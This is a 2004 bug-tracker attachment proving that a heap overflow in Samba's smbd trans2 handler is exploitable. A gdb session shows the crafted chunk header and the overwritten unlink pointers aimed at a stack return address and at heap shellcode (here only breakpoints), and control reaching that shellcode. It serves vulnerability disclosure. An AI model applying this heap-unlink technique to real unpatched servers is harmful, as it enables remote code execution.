Attachment 26053 Details for Bug 61203

proof-of-exploitability.txt

proof-of-exploitability.txt (text/plain), 5.34 KB, created by Marcus Meissner on 2004-11-12 21:15:56 UTC

(hide)

Description:

Filename:

MIME Type:

Creator: Marcus Meissner

Created: 2004-11-12 21:15:56 UTC

Size: 5.34 KB

patch

obsolete

>
>
>corinnaVM:~# ps ax
> ...
> 5841 ?        Ss     0:00 /usr/sbin/smbd -D
> 5842 ?        S      0:00 /usr/sbin/smbd -D
> 5843 tty1     S+     0:00 ./smbclient -I 127.0.0.1 -U badguy //xpee/badguy
> 5844 ?        S      0:00 /usr/sbin/smbd -D
> 5848 pts/2    R+     0:00 ps ax
>
>corinnaVM:~# gdb
>GNU gdb 6.1-debian
>Copyright 2004 Free Software Foundation, Inc.
>GDB is free software, covered by the GNU General Public License, and you are
>welcome to change it and/or distribute copies of it under certain conditions.
>Type "show copying" to see the conditions.
>There is absolutely no warranty for GDB.  Type "show warranty" for details.
>This GDB was configured as "i386-linux".
>(gdb) attach 5844
>Attaching to process 5844
>Reading symbols from /usr/sbin/smbd...done.
>Using host libthread_db library "/lib/tls/libthread_db.so.1".
>...
>Loaded symbols for /lib/tls/libnss_nis.so.2
>0x4025c3a8 in select () from /lib/tls/libc.so.6
>(gdb) continue
>Continuing.
>
>/// The breakpoint was created by compiling an INT 3 after the overwrite took place into trans2.c
>
>Program received signal SIGTRAP, Trace/breakpoint trap.
>call_trans2qfilepathinfo (conn=0x84282c0, inbuf=0x4051e008 "", outbuf=0x4053f008 "", length=1046, bufsize=131072,
>    pparams=0xbffff6e4, total_params=974, ppdata=0xbffff6e8, total_data=0) at smbd/trans2.c:2644
>
>(gdb) x/20x *ppdata-8
>
>/// Here the 0x00000409 is the malloc size descriptor 
>/// (0x400 + 4) aligned to 8   +  1 (previous block NOT free)
>/// After that the packet data starts with 8 byte blocks of dates
>
>0x8429760:      0xcccccccc      0x00000409      0xadf90680      0x01c4c2ee
>0x8429770:      0xadf90680      0x01c4c2ee      0xadf90680      0x01c4c2ee
>0x8429780:      0xadf90680      0x01c4c2ee      0x00000010      0x00000000
>0x8429790:      0x00100000      0x00000000      0x00000000      0x00000000
>0x84297a0:      0x00000002      0x00000100      0x00000000      0x00000000
>
>/// Here the unicode filename of the reply starts \ followed by the
>/// name... Note the 0xcc (int 3/breakpoints) this is actually our
>/// shellcode for now
>
>0x84297b0:      0xcccc005c      0xcccccccc      0xcccccccc      0xcccccccc
>0x84297c0:      0xcccccccc      0xcccccccc      0xcccccccc      0xcccccccc
>0x84297d0:      0xcccccccc      0xcccccccc      0x0048cccc      0x00480048
>0x84297e0:      0x00480048      0x00480048      0x00480048      0x00480048
>0x84297f0:      0x00480048      0x00480048      0x00480048      0x00480048
>
>/// Now have a look at the end of the buffer
>
>(gdb) x/20x *ppdata-8+0x408-16
>
>/// The first line are normal 'H' chars transformed into unicode
>/// The second line starts with a "dummy" value (which is still in
>/// the allocated buffer)
>/// The actual overflow are the bytes from 0x8429b6c - 0x8429b6f
>/// The first of the 3 overflow values represents a size of -4 saying 
>/// that the previous malloced block is actually filled. The -4 references
>/// of course to our "dummy" value which says that THIS malloc block is
>/// free. The other 2 values are 
>///    1. place on stack (-12) where RET-EIP is stored when the 
>///       malloc/free unlink macro is called and
>///    2. the place on heap where our shellcode (in our case only debugger
>///       breakpoints) is stored
>
>0x8429b58:      0x00480048      0x00480048      0x00480048      0x00480048
>0x8429b68:      0xfffffffc      0xfffffffd      0xbffff668      0x084297b8
>0x8429b78:      0x48484848      0x48484848      0x48484848      0x48484848
>0x8429b88:      0x48484848      0x48484848      0x48484848      0x48484848
>0x8429b98:      0x48484848      0x48484848      0x48484848      0x48484848
>
>(gdb) continue
>Continuing.
>
>/// TADA when free is called we land in our shellcode and voila
>
>Program received signal SIGTRAP, Trace/breakpoint trap.
>0x084297b9 in ?? ()
>(gdb)
>
>
>/// For those who do not understand all the stuff and why it happens
>/// here the result if our 1+2 pointers are changed to 0x55555555 and 0x66666666
>
>...
>(gdb) set *0x8429b70 = 0x55555555
>(gdb) set *0x8429b74 = 0x66666666
>(gdb) continue
>Continuing.
>
>Program received signal SIGSEGV, Segmentation fault.
>0x401fb498 in mallopt () from /lib/tls/libc.so.6
>
>/// Here the proof that we crash in the unlink macro
>/// Trying todo the unlink from the linked list...
>
>(gdb) x/5i $eip
>0x401fb498 <mallopt+1800>:      mov    %ebp,0xc(%eax)
>0x401fb49b <mallopt+1803>:      add    %edi,%esi
>0x401fb49d <mallopt+1805>:      mov    %eax,0x8(%ebp)
>0x401fb4a0 <mallopt+1808>:      mov    %esi,(%esi,%ecx,1)
>0x401fb4a3 <mallopt+1811>:      mov    0x14(%esp),%ebp
>
>/// Here the corresponding registers
>
>(gdb) i r
>eax            0x55555555       1431655765
>ecx            0x8429760        138581856
>edx            0xfffffff8       -8
>ebx            0x402bdedc       1076616924
>esp            0xbffff64c       0xbffff64c
>ebp            0x66666666       0x66666666
>esi            0x408    1032
>edi            0xfffffff8       -8
>eip            0x401fb498       0x401fb498
>eflags         0x10246  66118
>cs             0x73     115
>ss             0x7b     123
>ds             0x7b     123
>es             0x7b     123
>fs             0x0      0
>gs             0x33     51
>
>/// Here the proof that we are actually the "unlink macro" called from free
>
>(gdb) x/5i *(0xbffff668+12)
>0x401fa2b0 <free+144>:  cmpl   $0x0,%gs:0xc
>0x401fa2b8 <free+152>:  je,pt  0x401fa2bc <free+156>
>0x401fa2bb <free+155>:  lock subl $0x1,(%esi)
>0x401fa2bf <free+159>:  jne    0x401fdd68 <posix_memalign+6072>
>0x401fa2c5 <free+165>:  jmp    0x401fa257 <free+55>
>
>
>
>

Actions: View

Attachments on bug 61203: 26053